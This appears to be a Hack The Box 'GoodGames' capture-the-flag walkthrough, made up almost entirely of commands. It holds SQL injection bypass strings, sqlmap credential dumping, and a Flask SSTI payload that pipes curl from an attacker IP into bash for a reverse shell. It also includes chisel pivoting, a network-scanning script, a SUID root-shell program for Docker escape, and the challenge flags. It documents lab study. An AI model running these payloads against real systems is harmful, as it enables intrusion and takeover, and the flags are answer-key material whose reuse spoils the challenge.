Information Gathering
IP AddressOpening Ports10.10.11.130TCP:80 $ sudo masscan -p1-65535,U:1-65535 10.10.11.130 --rate=1000 -p1-65535,U:1-65535 -e tun0 > /tmp/ports
$ ports=$(cat /tmp/ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//')
$ nmap -Pn -sV -sC -p$ports 10.10.11.130
- PORT STATE SERVICE VERSION
- 80/tcp open http Apache httpd 2.4.51
- |_http-server-header: Werkzeug/2.0.2 Python/3.9.2
- |_http-title: GoodGames | Community and Store
- Service Info: Host: goodgames.htb
# echo '10.10.11.130 goodgames.htb' >> /etc/hosts
$ dirsearch -u 'http://goodgames.htb'
$ ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://FUZZ.goodgames.htb -H "Host: FUZZ.goodgames.htb" -ac
email=1%40gmail.com'--+&password=123
email=1%40gmail.com'%20OR%20'1'='1'--+&password=123
$ sqlmap -r sqli -p email --batch
$ sqlmap -r sqli -p email --batch -D main -T user --dump
email:admin@goodgames.htb
username:admin
password:superadministrator
# echo '10.10.11.130 internal-administration.goodgames.htb' >> /etc/hosts
Flask SSTI Injection
http://internal-administration.goodgames.htb/login
- POST /settings HTTP/1.1
- Host: internal-administration.goodgames.htb
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate, br
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 12
- Origin: http://internal-administration.goodgames.htb
- Connection: close
- Referer: http://internal-administration.goodgames.htb/settings
- Cookie: session=.eJwlzjmOAjEQQNG7OJ6gNttlLtOyaxFopBmpGyLE3WlE-F_0n2XLPY5rudz3R_yU7eblUmbNTKJOMTv2xlEnLvZRZa6cyFlXApt0B8yTWRbWcKjWxBynA7euMwcNqoxhGCBJQ62zDFouHEMJZWlVc9eVlg20Z-uGiOUceRyxf28-acee2_3_N_5OSIfAIS1aR1OxaO5jgShFCrBKJVTXVl5vIF4_KQ.Z5IPJg.xnuJSS0C6PcZvOJeMd6iV8AclZE
- Upgrade-Insecure-Requests: 1
- name={{9*9}}
name={{config.__class__.__init__.__globals__['os'].popen('curl%20http://10.10.16.16/rev|bash').read()}}
User.txt
388118f20c90df4d38744d9ac624dd43
Privilege Escalation : Docker Escape
Server:
$ chisel server -p 8000 --reverse
Client:
# ./chisel_1.10.1_linux_amd64 client 10.10.16.16:8000 R:localhost:1080:socks
Server:
$ vim 10.10.11.130.conf
Client:
# arp -a
https://raw.githubusercontent.com/S12cybersecurity/Pivoting_Enum/refs/heads/main/pivoting.sh
- #!/bin/bash
- RED="\e[31m"
- GREEN="\e[32m"
- YELLOW="\e[33m"
- ENDCOLOR="\e[0m"
- hostname=$(hostname)
- echo -e "${GREEN}[+] Basic Information on $hostname machine${ENDCOLOR}"
- echo -e "\n${YELLOW}List of Machine Local IP's:${ENDCOLOR}"
- ifconfig | awk '{print $(NF - -4), $NF}' | grep "172." | cut -c 2-
- ifconfig | awk '{print $(NF - -4), $NF}' | grep "192." | cut -c 2-
- ifconfig | awk '{print $(NF - -4), $NF}' | grep "10." | cut -c 2- | grep -v "0x10<host>"
- echo -e "\n${YELLOW}Utilities:${ENDCOLOR}"
- which aws
- which netcat
- which nc.traditional
- which curl
- which ping
- which gcc
- which g++
- which make
- which gdb
- which base64
- which socat
- which python
- which python2
- which python3
- which perl
- which php
- which ruby
- which xterm
- which sudo
- which wget
- which nc
- which nmap
- which fping
- echo -e "\n"
- echo -e "${GREEN}[+] Network Recon\n${ENDCOLOR}"
- if [ -z $1 ]
- then
- echo -e "${RED}[*] Syntax: <NETWORK/S TO SCAN> Format: 192.168.0 ${ENDCOLOR}"
- exit 1
- fi
- if [[ $# =~ 1 ]]
- then
- hosts=($1)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"$hosts
- fi
- if [[ $# =~ 2 ]]
- then
- hosts=($1 $2)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}
- fi
- if [[ $# =~ 3 ]]
- then
- hosts=($1 $2 $3)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}
- fi
- if [[ $# =~ 4 ]]
- then
- hosts=($1 $2 $3 $4)
- echo -e "${GREEN}List of Networks: ${ENDCOLOR}"${hosts[0]}", "${hosts[1]}", "${hosts[2]}", "${hosts[3]}
- fi
- for host in ${hosts[@]}; do
- echo -e "\n${YELLOW}[*] Enumerating Network: $host${ENDCOLOR}\n"
- for i in $(seq 1 254); do
- timeout 0.5 bash -c "ping -c 1 $host.$i" &> /dev/null
- a=$(echo $?)
- if [[ $a =~ 0 ]]
- then
- array[${#array[@]}]=$host.$i
- echo $host.$i >> hosts.txt
- b=$(ping -c 1 $host.$i | grep 'ttl' | awk '{print $(NF - 2), $NF}' | cut -c 5-7)
- if [[ $b =~ 64 ]] || [[ $b =~ 63 ]] || [[ $b =~ 62 ]]
- then
- echo "[+] HOST $host.$i ACTIVE [OS=Linux]"
-
- elif [[ $b =~ 128 ]] || [[ $b =~ 127 ]] || [[ $b =~ 126 ]]
- then
- echo "[+] HOST $host.$i ACTIVE [OS=Windows]"
- else
- echo "[+] HOST $host.$i ACTIVE [OS=UNDETECTED]"
- fi
- fi
- done; wait
- done
- for host in ${array[@]}; do
- echo -e "\n${YELLOW}[*] Scanning Ports on: $host${ENDCOLOR}\n"
- for port in $(seq 1 10001); do
- timeout 1 bash -c "echo '' > /dev/tcp/$host/$port" 2> /dev/null && echo -e "\t[+] PORT $host:$port OPEN" &
- done; wait
- done
Server:
$ sudo proxychains -f 10.10.11.130.conf ssh augustus@172.19.0.1
Docker用户创建test文件在augustus目次中test全部者是root
- #include <stdio.h>
- #include <stdlib.h>
- int main() {
- setuid(0);
- system("/bin/bash");
- }
# gcc suid.c -o suid
# chmod u+s suid
augustus@GoodGames:~$ ./suid
Root.txt
a42c76fe28f8a2556fa7e8794f133c15
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
